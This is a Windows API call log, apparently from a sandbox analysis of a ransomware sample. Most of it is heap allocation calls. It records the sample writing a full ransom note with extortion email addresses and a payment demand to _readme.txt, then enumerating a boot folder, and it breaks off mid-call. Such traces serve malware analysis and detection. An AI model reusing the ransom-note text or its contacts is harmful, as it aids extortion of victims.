[0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.611] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.616] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0227.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.616] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.616] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.616] PathFindFileNameW (pszPath="") returned="" [0227.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.616] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.617] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.617] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.617] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.617] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0227.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.617] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0227.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.619] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.619] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.619] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.619] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.620] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.620] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.620] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.620] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.620] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.621] HeapFree (in: 